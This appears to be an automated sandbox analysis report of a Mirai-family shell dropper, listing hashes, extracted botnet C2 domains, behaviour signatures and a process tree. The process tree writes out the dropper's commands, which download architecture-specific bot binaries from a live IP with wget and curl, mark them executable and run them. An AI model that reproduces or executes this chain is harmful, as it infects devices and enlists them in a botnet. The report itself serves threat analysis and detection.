Analysis
-
max time kernel
148s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
29-12-2024 21:37
Static task
static1
Behavioral task
behavioral1
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
51.79.141.121-sora.sh-2024-12-29T211113.sh
-
Size
2KB
-
MD5
0569b09a5951d5fe444efa1892b87687
-
SHA1
0d3df40a37ec718be33d83c1c9a962e982a51d17
-
SHA256
6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa
-
SHA512
fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d
Malware Config
Extracted
mirai
CONDI
botnet.tfmobile.store
report.tfmobile.store
Extracted
mirai
CONDI
botnet.tfmobile.store
Signatures
-
Mirai family
-
Contacts a large (33395) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 840 chmod 802 chmod 818 chmod 769 chmod 780 chmod 787 chmod 828 chmod 736 chmod 759 chmod 774 chmod 808 chmod 691 chmod 764 chmod 792 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 692 robben /tmp/robben 737 robben /tmp/robben 760 robben /tmp/robben 765 robben /tmp/robben 770 robben /tmp/robben 775 robben /tmp/robben 781 robben /tmp/robben 788 robben /tmp/robben 793 robben /tmp/robben 803 robben /tmp/robben 809 robben /tmp/robben 819 robben /tmp/robben 831 robben /tmp/robben 841 robben -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
Writes file to system bin folder 5 IoCs
description ioc Process File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben -
Changes its process name 5 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself xc14lc1z1h1i 803 robben Changes the process name, possibly in an attempt to hide itself jkgic59yx6ppot85s5ss 809 robben Changes the process name, possibly in an attempt to hide itself g5sfdk6dks80ly7icx0tlwrodwi5 819 robben Changes the process name, possibly in an attempt to hide itself fxrdxl80g25ijk1tl27o 831 robben Changes the process name, possibly in an attempt to hide itself eo91iw0xojwp1j9txusyr7dcad4aqodh 841 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 720 curl 735 cat 694 wget -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/botx.arm7 wget File opened for modification /tmp/botx.ppc wget File opened for modification /tmp/botx.ppc curl File opened for modification /tmp/botx.arm5 curl File opened for modification /tmp/botx.mips wget File opened for modification /tmp/botx.mips curl File opened for modification /tmp/botx.arm5 wget File opened for modification /tmp/robben 51.79.141.121-sora.sh-2024-12-29T211113.sh File opened for modification /tmp/botx.mpsl wget File opened for modification /tmp/botx.arm6 wget File opened for modification /tmp/botx.arm7 curl File opened for modification /tmp/botx.m68k wget File opened for modification /tmp/botx.m68k curl File opened for modification /tmp/botx.sh4 wget File opened for modification /tmp/botx.i686 curl File opened for modification /tmp/botx.x86 curl File opened for modification /tmp/botx.x86_64 curl File opened for modification /tmp/botx.i468 curl File opened for modification /tmp/botx.mpsl curl File opened for modification /tmp/botx.arm4 curl File opened for modification /tmp/botx.arm6 curl File opened for modification /tmp/botx.ppc440fp curl File opened for modification /tmp/botx.x86 wget File opened for modification /tmp/botx.sh4 curl
Processes
-
/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh1⤵
- Writes file to tmp directory
PID:638 -
/usr/bin/wgetwget http://51.79.141.121/where/botx.x862⤵
- Writes file to tmp directory
PID:640
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:667
-
-
/bin/catcat botx.x862⤵PID:689
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:692
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/catcat botx.mips2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.x86_642⤵PID:741
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/catcat botx.x86_642⤵PID:758
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i4682⤵PID:761
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/catcat botx.i4682⤵PID:763
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i6862⤵PID:766
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/catcat botx.i6862⤵PID:768
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:770
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mpsl2⤵
- Writes file to tmp directory
PID:771
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/catcat botx.mpsl2⤵PID:773
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm42⤵PID:777
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/catcat botx.arm42⤵PID:779
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:781
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm52⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/catcat botx.arm52⤵PID:786
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm62⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/catcat botx.arm62⤵PID:791
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm72⤵
- Writes file to tmp directory
PID:794
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/catcat botx.arm72⤵PID:801
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:803
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc2⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:809
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc440fp2⤵PID:815
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:819
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.m68k2⤵
- Writes file to tmp directory
PID:823
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:831
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.sh42⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:841
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD51092f7846a6ca7a5e92ece0ea93ff82e
SHA1140fd3e84c49d382e6b0f9a40730d1cd465f8347
SHA256a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2
SHA51211ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba
-
Filesize
71KB
MD5b5aeba1a09f5198a71db73371f6e01b6
SHA1246b98370fdf429e94ab4ca087828acabbbebd9c
SHA2567a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f
SHA51268db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57
-
Filesize
215B
MD50797a2600ddc5e8572bfb37b8af0aa29
SHA14f7fc88100b7896f12d953c0b7dd18f516e573d1
SHA2561f1fe3f0ef586643c0c73185c744b40b31c4241a90a30a0880c866dbc04fe538
SHA5120298488cf573edce6fa015e17439f3ed66285dfc5b908017e95c3a71f44f1f1949a64f69cb1ac8b64cb9e8c28c15ca0b35e8cd04265ffcae3f736f7151ef6dec
-
Filesize
213B
MD551b807212d0b7e7a9a37e4536b2d0133
SHA1f130ad0c7f78e1a99f76ed36c003cb5cac871843
SHA25694bf03444a7262f62fc6b9ca294b0cdb3bcf96d03fe1d5bdf286ddea26759c11
SHA512a86a291fbeeeae74466791679a9a22e9224a03e3a625676d678e9a11ca887c792ba8496dbac6e40fd3b289258698d7c5b882f33c89630532f7570de16bffd2e4
-
Filesize
213B
MD5033d284ddf80a0d366e8d7543fc26df4
SHA1fe4845a1d864f47c5d0e330a8fd9eaf7759aa9f5
SHA256f45f2580c1af1c5c96a1aa6a312b2079c21c1b929f418b91d9bf323a57f89aa8
SHA512e58e6f5200b6a9022c93da8d13a1a2bf2b50ad6fd5f1144e9979ae66adf9a441a796adebdd9cef942abeadb8ed42a5242c24dca330cb77730269233ff8839fb2
-
Filesize
128KB
MD5e1fbfe1054d3fa3e6d193c60670427b8
SHA1d1b7c7f9169f7d34b7b219cb70e512a07dbded88
SHA25660f7fc62b760c105480589c7219290c4778c85520f5e1f6e0f654656989f9cdb
SHA512595083014a6e15cec0f72838eea47b5beadc20997d65d39c6e331724dc9286095a8668022d0836fff769477f8b265ac10a5067826594768bc220bce456b82843